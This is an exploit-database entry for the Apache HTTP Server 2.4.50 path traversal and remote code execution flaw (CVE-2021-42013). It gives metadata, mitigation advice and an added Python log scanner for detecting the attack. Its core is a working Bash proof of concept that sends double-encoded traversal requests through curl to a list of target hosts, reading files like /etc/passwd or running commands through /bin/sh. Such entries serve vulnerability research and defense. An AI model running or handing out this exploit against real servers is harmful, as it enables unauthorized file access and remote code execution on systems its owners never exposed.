Vendor: Apache HTTP Server
By: Lucas Souza
CVSS: 9.8 (CRITICAL)
Title: Path Traversal & Remote Code Execution (RCE)
CWE: 22
Product Name: Apache HTTP Server
Affected Version From: 2.4.50
Affected Version To: 2.4.50
Patch Exists: YES
Related CVE: CVE-2021-42013
CPE: a:apache:http_server:2.4.50
Tags: cve,cve2021,lfi,apache,rce,misconfig,traversal,kev
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei Metadata: {'max-request': 3, 'verified': True, 'vendor': 'apache', 'product': 'http_server'}
Platforms Tested: Linux
2021

Exploit: Apache HTTP Server 2.4.50 – Path Traversal & Remote Code Execution (RCE)

This exploit uses a path traversal in Apache HTTP Server 2.4.50 to achieve remote code execution. It is written in Bash and uses curl to send a malicious payload to each target server. The payload contains a command that is executed on the target server. The exploit was tested on Apache HTTP Server 2.4.50.

Mitigation:

Update the Apache HTTP Server to the latest version. The server should also be configured so that only trusted users can access it.
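
Detection example (added here; not part of the original entry or the exploit author's code): the PoC's request path hides `..` as `%%32%65%%32%65`, which only becomes a dot-dot segment after two rounds of percent-decoding, so a log check has to decode repeatedly before looking for traversal. The sketch assumes Common/Combined Log Format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re

# Request line of a Common/Combined Log Format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"([A-Z]+) (\S+) HTTP/[\d.]+"')
PCT_RE = re.compile(r"%([0-9A-Fa-f]{2})")

def decode_rounds(path, limit=4):
    """Percent-decode until stable; return (decoded_path, rounds_that_changed_it)."""
    rounds = 0
    while rounds < limit:
        decoded = PCT_RE.sub(lambda m: chr(int(m.group(1), 16)), path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds

def classify(line):
    """Return None for a benign line, else a dict describing the traversal attempt."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    method, target = m.groups()
    raw_path = target.split("?", 1)[0]
    decoded, rounds = decode_rounds(raw_path)
    if ".." not in decoded.split("/"):
        return None  # no dot-dot path segment even after full decoding
    return {
        "method": method,
        "decoded": decoded,
        "encoding_rounds": rounds,  # 2 = double-encoded dots, as in the PoC path
        "cgi": raw_path.startswith("/cgi-bin/"),  # CGI prefix: command execution attempt
    }

def scan(lines):
    """Collect findings for every suspicious line."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample access-log lines (documentation IPs, not real traffic).
SAMPLE_LOG = [
    '198.51.100.4 - - [06/Oct/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.7 - - [06/Oct/2021:10:01:12 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 200 45',
    '203.0.113.7 - - [06/Oct/2021:10:01:15 +0000] "GET /icons/.%2e/%2e%2e/etc/passwd HTTP/1.1" 403 199',
    '198.51.100.4 - - [06/Oct/2021:10:02:30 +0000] "GET /docs/100%25-guide.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `encoding_rounds` of 2 and `cgi` set matches the request shape this PoC sends; the benign `%25` line shows that a single legitimate escape is not flagged.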

Exploit-DB raw data:

# Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage:  https://apache.org/
# Version: 2.4.50
# Tested on: 2.4.50
# CVE : CVE-2021-42013
# Credits: Ash Daulton and the cPanel Security Team

#!/bin/bash

if [[ $1 == '' ]] || [[ $2 == '' ]]; then
echo Set [TARGET-LIST.TXT] [PATH] [COMMAND]
echo ./PoC.sh targets.txt /etc/passwd
echo ./PoC.sh targets.txt /bin/sh id

exit
fi
for host in $(cat $1); do
echo $host
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2"; done

# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami